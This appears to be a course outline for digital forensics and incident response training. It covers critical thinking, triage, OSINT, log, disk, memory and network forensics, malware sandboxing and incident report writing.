Incident Response and Investigation

Sensemaking goes beyond analysis, a disaggregative process, and also beyond synthesis, which meaningfully integrates factors relevant to an issue. It includes an interpretation of the results of that analysis and synthesis. It is sometimes referred to as an approach to creating situational awareness “in situations of uncertainty.

You will be surprised that we wll discuss Forensic Entomology (the study of how insects consume decomposing human remains and provide data which can aid medical/legal investigations), but it is closer to cyber security and computer evidence collection and analysis than you think.

Becoming an investigator first and a computer expert second will give you better results than if you were a computer expert first - a frame of mind looking from the perspective of crime solving and time criticality will be the best you would achieve from this part of the course.

This skill assists incident responders by ensuring the formulation of sound conclusions about adversarial capabilities and intentions.

Thinking – or reasoning – involves objectively connecting present beliefs with evidence in order to believe something else.

Critical Thinking is a deliberate meta-cognitive (thinking about thinking) and cognitive (thinking) act whereby a person reflects on the quality of the reasoning process simultaneously while reasoning to a conclusion. The thinker has two equally important goals: coming to a solution and improving the way she or he reasons.

There are techniques used by law enforcement which are also effective in corporate environments. When you need a suspect to confess in an action, you can use these techniques in much the same way.

s it bureaucratic to focus on the ticketing system management for incident response first? No.

This is the foundation on which you build the whole DFIR process. Every team member must know what to focus on in the first seconds of an incidents, what to record and when.

In an emergency, these skills must play on autopilot for everyone – and everyone must have the habit of meticulous record taking, is this is the only way to maintain the incident timeline and improve every step in the process during the post-incident analysis.

The Triage process must be understood and practiced.

The four-(at least) eyes method will guide incident responders and forensic analysts in their thoughts and actions and help them avoid human error.

The more experience someone has in cybersecurity, tech, forensics, the more they tend to become overly confident and make rookie omissions. Triage helps them stay focused on the minute details, which can turn the whole investigation around.

There are 12+ types of cybersecurity incidents and each requires collecting different types of evidence from various sources.

Knowing where to look is key in evidence collection, but also knowing how to collect and preserve evidence is crucial in being able to use it during an investigation or in court.

OSINT informs the decisions of analysts and investigators during the initial stages and all further stages of an investigation.

It provides valuable anchors from which to branch out to different vectors of investigation and evidence collection.

We will practice using Open Source Intelligence sources to collect information about people and technologies. Connecting both is crucial.

20+ GB of log files is an everyday occurrence when investigating cybercrime. Can you really find that one line to proceed with the investigation?

We will teach every student how to filter out the useless information and focus on the data points that inform our next steps in the investigation.

In the end, it will take them 20 minutes to process 20 GB of log files and find the lines that matter.

The MFT and Journal files of a Windows OS are just two of many sources of valuable information.

We will learn how to quickly create and analyze drive images from various sources, how to process and extract data we need, even how to boot a disk image into a fully operational machine and work with it live in a Virtual Machine environment.

Sometimes the only way to get to an encrypted hard drive is through the live memory of an encrypted machine.

Memory dumps show us data that is impossible to get from a hard drive image – such as malware that lives in memory only, or encryption keys, or other volatile data that does not get recorded on disk after a reboot.

The skill to collect and analyze memory dumps is critical for any incident responder or forensic analyst.

Wireshark is too basic for most practical purposes. We will dive into various methods of analyzing both huge amounts of traffic on an enterprise scale and analyzing small network captures from endpoints.

Students will learn to extract files from network traffic, build a timeline of events based on network traffic, extract IoCs and other aspects of network forensics.

Static and Dynamic analysis of malware are key skills even if one does not aspire to become a Reverse engineer. 

We will learn how to build a sandbox and analyze executable files in document and binary format. 

Knowing how malware operates will give participants the knowledge where to look for evidence and how to prevent malware from infecting corporate machines. 

Often underestimated, the skill to create valuable, actionable Incident Reports is a must for every Incident Responder and Forensic analyst. 

We will learn how to create two types of reports: Executive and Technical ones. Both should be admissible in court.